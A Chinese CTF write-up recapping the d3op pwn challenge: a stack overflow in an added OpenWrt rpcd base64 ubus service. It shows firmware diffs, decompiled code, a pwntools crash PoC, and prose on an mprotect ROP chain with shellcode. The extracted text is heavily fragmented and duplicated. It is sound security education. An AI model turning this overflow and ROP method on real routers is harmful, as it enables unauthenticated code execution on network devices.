-
-
[原创]AntCTF x D³CTF 2023 d3op复盘笔记
-
发表于: 2023-5-12 16:51 20596
-
题目类型为PWN,描述如下:
题目文件:https://github.com/z1r00/ctf-pwn/blob/main/AntCTF%20x%20D%C2%B3CTF/d3op/d3op-attachment-d362854d3418636059155138fd58997c.zip
把题目给的固件进行解包,然后发现是Openwrt 22.03.3
给的HINTS是diff一下,那就再从官网上下载一个22.03.3然后diff一下,diff结果如下
可以看到题目多了network,和base64这两个关键的东西
同时也得知base64是属于ubus模块
ubus list 即可看到当前ubus中注册的接口
如果想要与base64进行交互的话用call,但是需要先知道base64的输入格式是什么
知道了有两个方法,一个是encode和decode,调用如下
可以看到z1r0被base64编码并输出出来,漏洞点大概率就出在base64这里,至此初步分析完成
主函数是参数传递逻辑,当./base64 call 的时候会进入read_input
read_input的逻辑就是可以继续输入一串数据,然后输入的数据进行一些处理之后会筛选出是否存在input,此时会进入下一个check逻辑
看一下ckec
所以当执行./base64 call encode/decode的时候可以正常运行到encode/decode的处理逻辑
至此,得以进入decode/encode的处理逻辑的完整命令是
先看一下decode
在decode最前面,会得到长度。如果decode的时候存在=号则len--,可以看到最后v16中的index并没有进行检查大小,导致溢出
到此漏洞点寻找完成
接下来就是如何去利用这个漏洞,首先看一下保护
可以直接覆盖返回地址来劫持程序流,写出如下poc
调试的时候发现会在下面这个地方SIGSEGV了
看一下汇编
X0这里的地址取错了,0x450 - 8 = 0x448 = v24
,在溢出的时候把v24给覆盖了之后导致的SIGSEGV结果
所以需要把v22 v23 v24 v25都处置正确才可以继续
所以写了如下poc
发现可以成功控制ret为0x6262626262626262,接下来就是构造rop
没找到system,但是发现了mprotect
如果可以控制a1,a2,a3
就可以直接分配rwx来执行shellcode,用rwctf shellfind的方法来看交叉引用,从而寻找可以控制a1 a2 a3
中的一个,并且可以同时执行sub_423340
的地址
这样做的原因是因为笔者直接找借助x21 x19然后mov到x1 x2的gadgets,但是控制之后执行sub_423340
会因为x21 x19的设置导致一些问题
如果可以控制a1, a2, a3
中的任何一个并且可以执行sub_423340
,这个时候就可以跳到shellcode那里了
上面这一段就符合要求,控制了x19之后然后再控制x2,最后到上面这一段
官方wp上的要更简单,控制x0即可,然后跳到shellcode那里
shellcode可以用orw,下面是用base64运行时的exp,可以看到flag成功被输出
但是远程的时候会出现问题
result里没有flag的输出,是因为输出的格式是{"output":"flag"}
,而上面的0x4a2098
这里直接存放的是flag,所以需要在一个地址里构造一下{"output": "
,然后再将flag放到后面,最后加上"}
即可
最终本地exp如下
远程如下
远程交互如下
至此,d3op复盘结束
学到了很多,ubus的通信,如何优雅的使用gadgets(XD
d3op
It might take a
long
time to start up, please connect about
2
minutes after the gambox start.
HINTS:
May be you need to do a diff with the rootfs
in
attachment.
d3op
It might take a
long
time to start up, please connect about
2
minutes after the gambox start.
HINTS:
May be you need to do a diff with the rootfs
in
attachment.
_______ ________ __
| |.
-
-
-
-
-
.
-
-
-
-
-
.
-
-
-
-
-
.| | | |.
-
-
-
-
.| |_
|
-
|| _ |
-
__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
OpenWrt
22.03
.
3
, r20028
-
43d71ad93e
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
_______ ________ __
| |.
-
-
-
-
-
.
-
-
-
-
-
.
-
-
-
-
-
.| | | |.
-
-
-
-
.| |_
|
-
|| _ |
-
__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
OpenWrt
22.03
.
3
, r20028
-
43d71ad93e
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff: openwrt
/
squashfs
-
root
/
etc
/
TZ: No such
file
or
directory
Only
in
d3op
/
squashfs
-
root
/
etc
/
config: network
diff: openwrt
/
squashfs
-
root
/
etc
/
localtime: No such
file
or
directory
diff: openwrt
/
squashfs
-
root
/
etc
/
mtab: No such
file
or
directory
diff: openwrt
/
squashfs
-
root
/
etc
/
ppp
/
resolv.conf: No such
file
or
directory
diff: openwrt
/
squashfs
-
root
/
etc
/
resolv.conf: No such
file
or
directory
diff
-
-
color
-
aur openwrt
/
squashfs
-
root
/
etc
/
shadow d3op
/
squashfs
-
root
/
etc
/
shadow
-
-
-
openwrt
/
squashfs
-
root
/
etc
/
shadow
2023
-
01
-
03
08
:
24
:
21
+
+
+
d3op
/
squashfs
-
root
/
etc
/
shadow
2023
-
04
-
12
17
:
33
:
08
@@
-
1
,
4
+
1
,
4
@@
-
root:::
0
:
99999
:
7
:::
+
root:$
6
$JlPmKq
/
ZhqQ0I6V6$B74FL6cufcnZKT4G0sUz3xNP0Pr4k7yOG2I091f2OFOmcldS2s7CPJwOcfx0r
/
OshYDOFKw76APIqPHBXCdXb
/
:
19442
::::::
daemon:
*
:
0
:
0
:
99999
:
7
:::
ftp:
*
:
0
:
0
:
99999
:
7
:::
network:
*
:
0
:
0
:
99999
:
7
:::
diff: openwrt
/
squashfs
-
root
/
etc
/
ssl
/
cert.pem: No such
file
or
directory
Only
in
d3op
/
squashfs
-
root: flag
diff: openwrt
/
squashfs
-
root
/
sbin
/
insmod: No such
file
or
directory
diff: openwrt
/
squashfs
-
root
/
sbin
/
lsmod: No such
file
or
directory
diff: openwrt
/
squashfs
-
root
/
sbin
/
modinfo: No such
file
or
directory
diff: openwrt
/
squashfs
-
root
/
sbin
/
modprobe: No such
file
or
directory
diff: openwrt
/
squashfs
-
root
/
sbin
/
rmmod: No such
file
or
directory
diff: openwrt
/
squashfs
-
root
/
usr
/
bin
/
scp: No such
file
or
directory
diff: openwrt
/
squashfs
-
root
/
usr
/
bin
/
ssh: No such
file
or
directory
diff: openwrt
/
squashfs
-
root
/
usr
/
bin
/
wget: No such
file
or
directory
Only
in
d3op
/
squashfs
-
root
/
usr
/
libexec
/
rpcd: base64
diff
-
-
color
-
aur openwrt
/
squashfs
-
root
/
usr
/
share
/
rpcd
/
acl.d
/
unauthenticated.json d3op
/
squashfs
-
root
/
usr
/
share
/
rpcd
/
acl.d
/
unauthenticated.json
-
-
-
openwrt
/
squashfs
-
root
/
usr
/
share
/
rpcd
/
acl.d
/
unauthenticated.json
2023
-
01
-
03
08
:
24
:
21
+
+
+
d3op
/
squashfs
-
root
/
usr
/
share
/
rpcd
/
acl.d
/
unauthenticated.json
2023
-
04
-
10
02
:
25
:
53
@@
-
1
,
13
+
1
,
17
@@
{
-
"unauthenticated"
: {
-
"description"
:
"Access controls for unauthenticated requests"
,
-
"read"
: {
-
"ubus"
: {
-
"session"
: [
-
"access"
,
-
"login"
-
]
-
}
-
}
-
}
+
"unauthenticated"
: {
+
"description"
:
"Access controls for unauthenticated requests"
,
+
"read"
: {
+
"ubus"
: {
+
"session"
: [
+
"access"
,
+
"login"
+
],
+
"base64"
: [
+
"decode"
,
+
"encode"
+
]
+
}
+
}
+
}
}
diff: openwrt
/
squashfs
-
root
/
etc
/
TZ: No such
file
or
directory
Only
in
d3op
/
squashfs
-
root
/
etc
/
config: network
diff: openwrt
/
squashfs
-
root
/
etc
/
localtime: No such
file
or
directory
diff: openwrt
/
squashfs
-
root
/
etc
/
mtab: No such
file
or
directory
diff: openwrt
/
squashfs
-
root
/
etc
/
ppp
/
resolv.conf: No such
file
or
directory
diff: openwrt
/
squashfs
-
root
/
etc
/
resolv.conf: No such
file
or
directory
diff
-
-
color
-
aur openwrt
/
squashfs
-
root
/
etc
/
shadow d3op
/
squashfs
-
root
/
etc
/
shadow
-
-
-
openwrt
/
squashfs
-
root
/
etc
/
shadow
2023
-
01
-
03
08
:
24
:
21
+
+
+
d3op
/
squashfs
-
root
/
etc
/
shadow
2023
-
04
-
12
17
:
33
:
08
@@
-
1
,
4
+
1
,
4
@@
-
root:::
0
:
99999
:
7
:::
+
root:$
6
$JlPmKq
/
ZhqQ0I6V6$B74FL6cufcnZKT4G0sUz3xNP0Pr4k7yOG2I091f2OFOmcldS2s7CPJwOcfx0r
/
OshYDOFKw76APIqPHBXCdXb
/
:
19442
::::::
daemon:
*
:
0
:
0
:
99999
:
7
:::
ftp:
*
:
0
:
0
:
99999
:
7
:::
network:
*
:
0
:
0
:
99999
:
7
:::
diff: openwrt
/
squashfs
-
root
/
etc
/
ssl
/
cert.pem: No such
file
or
directory
Only
in
d3op
/
squashfs
-
root: flag
diff: openwrt
/
squashfs
-
root
/
sbin
/
insmod: No such
file
or
directory
diff: openwrt
/
squashfs
-
root
/
sbin
/
lsmod: No such
file
or
directory
diff: openwrt
/
squashfs
-
root
/
sbin
/
modinfo: No such
file
or
directory
diff: openwrt
/
squashfs
-
root
/
sbin
/
modprobe: No such
file
or
directory
diff: openwrt
/
squashfs
-
root
/
sbin
/
rmmod: No such
file
or
directory
diff: openwrt
/
squashfs
-
root
/
usr
/
bin
/
scp: No such
file
or
directory
diff: openwrt
/
squashfs
-
root
/
usr
/
bin
/
ssh: No such
file
or
directory
diff: openwrt
/
squashfs
-
root
/
usr
/
bin
/
wget: No such
file
or
directory
Only
in
d3op
/
squashfs
-
root
/
usr
/
libexec
/
rpcd: base64
diff
-
-
color
-
aur openwrt
/
squashfs
-
root
/
usr
/
share
/
rpcd
/
acl.d
/
unauthenticated.json d3op
/
squashfs
-
root
/
usr
/
share
/
rpcd
/
acl.d
/
unauthenticated.json
-
-
-
openwrt
/
squashfs
-
root
/
usr
/
share
/
rpcd
/
acl.d
/
unauthenticated.json
2023
-
01
-
03
08
:
24
:
21
+
+
+
d3op
/
squashfs
-
root
/
usr
/
share
/
rpcd
/
acl.d
/
unauthenticated.json
2023
-
04
-
10
02
:
25
:
53
@@
-
1
,
13
+
1
,
17
@@
{
-
"unauthenticated"
: {
-
"description"
:
"Access controls for unauthenticated requests"
,
-
"read"
: {
-
"ubus"
: {
-
"session"
: [
-
"access"
,
-
"login"
-
]
-
}
-
}
-
}
+
"unauthenticated"
: {
+
"description"
:
"Access controls for unauthenticated requests"
,
+
"read"
: {
+
"ubus"
: {
+
"session"
: [
+
"access"
,
+
"login"
+
],
+
"base64"
: [
+
"decode"
,
+
"encode"
+
]
+
}
+
}
+
}
}
Only
in
d3op
/
squashfs
-
root
/
usr
/
libexec
/
rpcd: base64
+
"unauthenticated"
: {
+
"description"
:
"Access controls for unauthenticated requests"
,
+
"read"
: {
+
"ubus"
: {
+
"session"
: [
+
"access"
,
+
"login"
+
],
+
"base64"
: [
+
"decode"
,
+
"encode"
+
]
+
}
+
}
+
}
Only
in
d3op
/
squashfs
-
root
/
usr
/
libexec
/
rpcd: base64
+
"unauthenticated"
: {
+
"description"
:
"Access controls for unauthenticated requests"
,
+
"read"
: {
+
"ubus"
: {
+
"session"
: [
+
"access"
,
+
"login"
+
],
+
"base64"
: [
+
"decode"
,
+
"encode"
+
]
+
}
+
}
+
}
-
list
[<path>]
List
objects
-
call <path> <method> [<message>] Call an
object
method
-
listen [<path>...] Listen
for
events
-
send <
type
> [<message>] Send an event
-
wait_for <
object
> [<
object
>...] Wait
for
multiple objects to appear on ubus
-
list
[<path>]
List
objects
-
call <path> <method> [<message>] Call an
object
method
-
listen [<path>...] Listen
for
events
-
send <
type
> [<message>] Send an event
-
wait_for <
object
> [<
object
>...] Wait
for
multiple objects to appear on ubus
root@(none):
/
# ubus list
base64
container
dhcp
file
hotplug.dhcp
hotplug.iface
hotplug.neigh
hotplug.net
hotplug.ntp
hotplug.tftp
iwinfo
luci
luci
-
rpc
network
network.device
network.interface
network.interface.lan
network.interface.loopback
network.rrdns
network.wireless
rc
service
session
system
uci
root@(none):
/
# ubus list
base64
container
dhcp
file
hotplug.dhcp
hotplug.iface
hotplug.neigh
hotplug.net
hotplug.ntp
hotplug.tftp
iwinfo
luci
luci
-
rpc
network
network.device
network.interface
network.interface.lan
network.interface.loopback
network.rrdns
network.wireless
rc
service
session
system
uci
root@(none):
/
# ubus -v list base64
'base64'
@
1e449b72
"encode"
:{
"input"
:
"String"
}
"decode"
:{
"input"
:
"String"
}
root@(none):
/
# ubus -v list base64
'base64'
@
1e449b72
"encode"
:{
"input"
:
"String"
}
"decode"
:{
"input"
:
"String"
}
root@(none):
/
# ubus call base64 encode '{"input" : "z1r0"}'
{
"output"
:
"ejFyMAA="
}
root@(none):
/
# ubus call base64 encode '{"input" : "z1r0"}'
{
"output"
:
"ejFyMAA="
}
int
__cdecl main(
int
argc, const char
*
*
argv, const char
*
*
envp)
{
char v6[
4096
];
/
/
[xsp
+
28h
] [xbp
-
1028h
] BYREF
unsigned __int64
*
specific_method;
/
/
[xsp
+
1028h
] [xbp
-
28h
]
__int64 v8;
/
/
[xsp
+
1030h
] [xbp
-
20h
]
__int64
*
v9;
/
/
[xsp
+
1038h
] [xbp
-
18h
]
int
v10;
/
/
[xsp
+
1044h
] [xbp
-
Ch]
unsigned __int64
*
method;
/
/
[xsp
+
1048h
] [xbp
-
8h
]
init_base64();
/
/
base64表
if
( argc <
=
1
)
return
0
;
method
=
argv[
1
];
if
( check_method(method,
"list"
) )
{
v10
=
read_input(
0
, v6,
0xFFFuLL
);
v6[v10]
=
0
;
v9
=
sub_402478(v6);
if
( v9 )
{
v8
=
sub_403C90(v9,
"input"
);
if
( v8 && sub_4059D0(v8) )
{
specific_method
=
argv[
2
];
if
( !check_method(method,
"call"
) )
{
ckec(specific_method,
*
(v8
+
32
), byte_4A2098);
sub_40B230(
"{\"output\": \"%s\"}\n"
, byte_4A2098);
sub_400A10(v9);
}
return
0
;
}
else
{
return
0
;
}
}
else
{
return
0
;
}
}
else
{
uloop_init();
return
0
;
}
}
int
__cdecl main(
int
argc, const char
*
*
argv, const char
*
*
envp)
{
char v6[
4096
];
/
/
[xsp
+
28h
] [xbp
-
1028h
] BYREF
unsigned __int64
*
specific_method;
/
/
[xsp
+
1028h
] [xbp
-
28h
]
__int64 v8;
/
/
[xsp
+
1030h
] [xbp
-
20h
]
__int64
*
v9;
/
/
[xsp
+
1038h
] [xbp
-
18h
]
int
v10;
/
/
[xsp
+
1044h
] [xbp
-
Ch]
unsigned __int64
*
method;
/
/
[xsp
+
1048h
] [xbp
-
8h
]
init_base64();
/
/
base64表
if
( argc <
=
1
)
return
0
;
method
=
argv[
1
];
if
( check_method(method,
"list"
) )
{
v10
=
read_input(
0
, v6,
0xFFFuLL
);
v6[v10]
=
0
;
v9
=
sub_402478(v6);
if
( v9 )
{
v8
=
sub_403C90(v9,
"input"
);
if
( v8 && sub_4059D0(v8) )
{
specific_method
=
argv[
2
];
if
( !check_method(method,
"call"
) )
{
ckec(specific_method,
*
(v8
+
32
), byte_4A2098);
sub_40B230(
"{\"output\": \"%s\"}\n"
, byte_4A2098);
sub_400A10(v9);
}
return
0
;
}
else
{
return
0
;
}
}
else
{
return
0
;
}
}
else
{
uloop_init();
return
0
;
}
}
unsigned __int64 __fastcall sub_422E60(
int
a1, void
*
a2, size_t a3)
{
unsigned __int64 v4;
/
/
x19
unsigned
int
v8;
/
/
w3
unsigned __int64 v9;
/
/
x19
int
v10;
/
/
w2
int
v11;
/
/
w2
if
( byte_4A0F78 )
{
v4
=
linux_eabi_syscall(__NR_read, a1, a2, a3);
if
( v4 >
0xFFFFFFFFFFFFF000LL
)
{
v10
=
-
v4;
v4
=
-
1LL
;
*
(&dword_4A8590
+
_ReadStatusReg(ARM64_SYSREG(
3
,
3
,
13
,
0
,
2
)))
=
v10;
}
return
v4;
}
else
{
v8
=
sub_444C30();
v9
=
linux_eabi_syscall(__NR_read, a1, a2, a3);
if
( v9 >
0xFFFFFFFFFFFFF000LL
)
{
v11
=
-
v9;
v9
=
-
1LL
;
*
(&dword_4A8590
+
_ReadStatusReg(ARM64_SYSREG(
3
,
3
,
13
,
0
,
2
)))
=
v11;
}
sub_444CC0(v8);
return
v9;
}
}
unsigned __int64 __fastcall sub_422E60(
int
a1, void
*
a2, size_t a3)
{
unsigned __int64 v4;
/
/
x19
unsigned
int
v8;
/
/
w3
unsigned __int64 v9;
/
/
x19
int
v10;
/
/
w2
int
v11;
/
/
w2
if
( byte_4A0F78 )
{
v4
=
linux_eabi_syscall(__NR_read, a1, a2, a3);
if
( v4 >
0xFFFFFFFFFFFFF000LL
)
{
v10
=
-
v4;
v4
=
-
1LL
;
*
(&dword_4A8590
+
_ReadStatusReg(ARM64_SYSREG(
3
,
3
,
13
,
0
,
2
)))
=
v10;
}
return
v4;
}
else
{
v8
=
sub_444C30();
v9
=
linux_eabi_syscall(__NR_read, a1, a2, a3);
if
( v9 >
0xFFFFFFFFFFFFF000LL
)
{
v11
=
-
v9;
v9
=
-
1LL
;
*
(&dword_4A8590
+
_ReadStatusReg(ARM64_SYSREG(
3
,
3
,
13
,
0
,
2
)))
=
v11;
}
sub_444CC0(v8);
return
v9;
}
}
ckec(specific_method,
*
(v8
+
32
), byte_4A2098);
sub_40B230(
"{\"output\": \"%s\"}\n"
, byte_4A2098);
sub_400A10(v9);
ckec(specific_method,
*
(v8
+
32
), byte_4A2098);
sub_40B230(
"{\"output\": \"%s\"}\n"
, byte_4A2098);
sub_400A10(v9);
__int64 __fastcall sub_4064F0(unsigned __int64
*
a1, __int64 a2, __int64 a3)
{
if
( check_method(a1,
"encode"
) )
{
if
( !check_method(a1,
"decode"
) )
decode(a2, a3);
}
else
{
encode(a2, a3);
}
return
0LL
;
}
__int64 __fastcall sub_4064F0(unsigned __int64
*
a1, __int64 a2, __int64 a3)
{
if
( check_method(a1,
"encode"
) )
{
if
( !check_method(a1,
"decode"
) )
decode(a2, a3);
}
else
{
encode(a2, a3);
}
return
0LL
;
}
➜ squashfs
-
root .
/
base64 call encode
{
"input"
:
"z1r0"
}
{
"output"
:
"ejFyMAA="
}
➜ squashfs
-
root .
/
base64 call encode
{
"input"
:
"z1r0"
}
{
"output"
:
"ejFyMAA="
}
__int64 __fastcall decode(char
*
json_input, __int64 out_put)
{
int
v3;
/
/
w0
int
v4;
/
/
w0
int
v5;
/
/
w0
int
v6;
/
/
w0
int
v7;
/
/
w0
int
v8;
/
/
w0
int
v9;
/
/
w0
int
v10;
/
/
w0
int
v11;
/
/
w0
int
v12;
/
/
w0
int
v13;
/
/
w0
char v16[
1028
];
/
/
[xsp
+
28h
] [xbp
+
28h
]
int
v17;
/
/
[xsp
+
42Ch
] [xbp
+
42Ch
]
int
v18;
/
/
[xsp
+
430h
] [xbp
+
430h
]
int
v19;
/
/
[xsp
+
434h
] [xbp
+
434h
]
int
v20;
/
/
[xsp
+
438h
] [xbp
+
438h
]
int
v21;
/
/
[xsp
+
43Ch
] [xbp
+
43Ch
]
unsigned
int
size;
/
/
[xsp
+
440h
] [xbp
+
440h
]
unsigned
int
v23;
/
/
[xsp
+
444h
] [xbp
+
444h
]
unsigned
int
v24;
/
/
[xsp
+
448h
] [xbp
+
448h
]
unsigned
int
len
;
/
/
[xsp
+
44Ch
] [xbp
+
44Ch
]
size
=
sub_400300();
if
( (size &
3
) !
=
0
)
return
0LL
;
len
=
3
*
(size >>
2
);
if
( json_input[size
-
1
]
=
=
'='
)
-
-
len
;
if
( json_input[size
-
2
]
=
=
61
)
-
-
len
;
if
( out_put )
{
v24
=
0
;
v23
=
0
;
while
( size > v24 )
{
if
( json_input[v24]
=
=
61
)
{
+
+
v24;
v3
=
0
;
}
else
{
v4
=
v24
+
+
;
v3
=
byte_4A1F98[json_input[v4]];
}
v21
=
v3;
if
( json_input[v24]
=
=
61
)
{
+
+
v24;
v5
=
0
;
}
else
{
v6
=
v24
+
+
;
v5
=
byte_4A1F98[json_input[v6]];
}
v20
=
v5;
if
( json_input[v24]
=
=
61
)
{
+
+
v24;
v7
=
0
;
}
else
{
v8
=
v24
+
+
;
v7
=
byte_4A1F98[json_input[v8]];
}
v19
=
v7;
if
( json_input[v24]
=
=
61
)
{
+
+
v24;
v9
=
0
;
}
else
{
v10
=
v24
+
+
;
v9
=
byte_4A1F98[json_input[v10]];
}
v18
=
v9;
v17
=
v9
+
(v21 <<
18
)
+
(v20 <<
12
)
+
(v19 <<
6
);
if
(
len
> v23 )
{
v11
=
v23
+
+
;
v16[v11]
=
BYTE2(v17);
}
if
(
len
> v23 )
{
v12
=
v23
+
+
;
v16[v12]
=
BYTE1(v17);
}
if
(
len
> v23 )
{
v13
=
v23
+
+
;
v16[v13]
=
v17;
}
}
sub_4002B0();
}
return
0LL
;
}
__int64 __fastcall decode(char
*
json_input, __int64 out_put)
{
int
v3;
/
/
w0
int
v4;
/
/
w0
int
v5;
/
/
w0
int
v6;
/
/
w0
int
v7;
/
/
w0
int
v8;
/
/
w0
int
v9;
/
/
w0
int
v10;
/
/
w0
int
v11;
/
/
w0
int
v12;
/
/
w0
int
v13;
/
/
w0
char v16[
1028
];
/
/
[xsp
+
28h
] [xbp
+
28h
]
int
v17;
/
/
[xsp
+
42Ch
] [xbp
+
42Ch
]
int
v18;
/
/
[xsp
+
430h
] [xbp
+
430h
]
int
v19;
/
/
[xsp
+
434h
] [xbp
+
434h
]
int
v20;
/
/
[xsp
+
438h
] [xbp
+
438h
]
int
v21;
/
/
[xsp
+
43Ch
] [xbp
+
43Ch
]
unsigned
int
size;
/
/
[xsp
+
440h
] [xbp
+
440h
]
unsigned
int
v23;
/
/
[xsp
+
444h
] [xbp
+
444h
]
unsigned
int
v24;
/
/
[xsp
+
448h
] [xbp
+
448h
]
unsigned
int
len
;
/
/
[xsp
+
44Ch
] [xbp
+
44Ch
]
size
=
sub_400300();
if
( (size &
3
) !
=
0
)
return
0LL
;
len
=
3
*
(size >>
2
);
if
( json_input[size
-
1
]
=
=
'='
)
-
-
len
;
if
( json_input[size
-
2
]
=
=
61
)
-
-
len
;
if
( out_put )
{
v24
=
0
;
v23
=
0
;
while
( size > v24 )
{
if
( json_input[v24]
=
=
61
)
{
+
+
v24;
v3
=
0
;
}
else
{
v4
=
v24
+
+
;
v3
=
byte_4A1F98[json_input[v4]];
}
v21
=
v3;
if
( json_input[v24]
=
=
61
)
{
+
+
v24;
v5
=
0
;
}
else
{
v6
=
v24
+
+
;
v5
=
byte_4A1F98[json_input[v6]];
}
v20
=
v5;
if
( json_input[v24]
=
=
61
)
{
+
+
v24;
v7
=
0
;
}
else
{
v8
=
v24
+
+
;
v7
=
byte_4A1F98[json_input[v8]];
}
v19
=
v7;
if
( json_input[v24]
=
=
61
)
{
+
+
v24;
v9
=
0
;
}
else
{
v10
=
v24
+
+
;
v9
=
byte_4A1F98[json_input[v10]];
}
v18
=
v9;
v17
=
v9
+
(v21 <<
18
)
+
(v20 <<
12
)
+
(v19 <<
6
);
if
(
len
> v23 )
{
v11
=
v23
+
+
;
v16[v11]
=
BYTE2(v17);
}
if
(
len
> v23 )
{
v12
=
v23
+
+
;
v16[v12]
=
BYTE1(v17);
}
if
(
len
> v23 )
{
v13
=
v23
+
+
;
v16[v13]
=
v17;
}
}
sub_4002B0();
}
return
0LL
;
}
Arch: aarch64
-
64
-
little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (
0x400000
)
Arch: aarch64
-
64
-
little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (
0x400000
)
from
pwn
import
*
from
os
import
system
import
base64
li
=
lambda
x :
print
(
'\x1b[01;38;5;214m'
+
str
(x)
+
'\x1b[0m'
)
ll
=
lambda
x :
print
(
'\x1b[01;38;5;1m'
+
str
(x)
+
'\x1b[0m'
)
file_name
=
'./base64'
r
=
process([file_name,
'call'
,
'decode'
])
def
dbgg():
raw_input
()
elf
=
ELF(file_name)
dbgg()
p1
=
b
'aaaa'
p1
=
p1.ljust(
0x458
, b
"a"
)
p1
=
base64.b64encode(p1)
ret
=
0x406550
li(p1)
p2
=
b
'{"input":"'
+
p1
+
b
'"}'
li(p2)
r.sendline(p2)
r.interactive()
from
pwn
import
*
from
os
import
system
import
base64
li
=
lambda
x :
print
(
'\x1b[01;38;5;214m'
+
str
(x)
+
'\x1b[0m'
)
ll
=
lambda
x :
print
(
'\x1b[01;38;5;1m'
+
str
(x)
+
'\x1b[0m'
)
file_name
=
'./base64'
r
=
process([file_name,
'call'
,
'decode'
])
def
dbgg():
raw_input
()
elf
=
ELF(file_name)
dbgg()
p1
=
b
'aaaa'
p1
=
p1.ljust(
0x458
, b
"a"
)
p1
=
base64.b64encode(p1)
ret
=
0x406550
li(p1)
p2
=
b
'{"input":"'
+
p1
+
b
'"}'
li(p2)
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)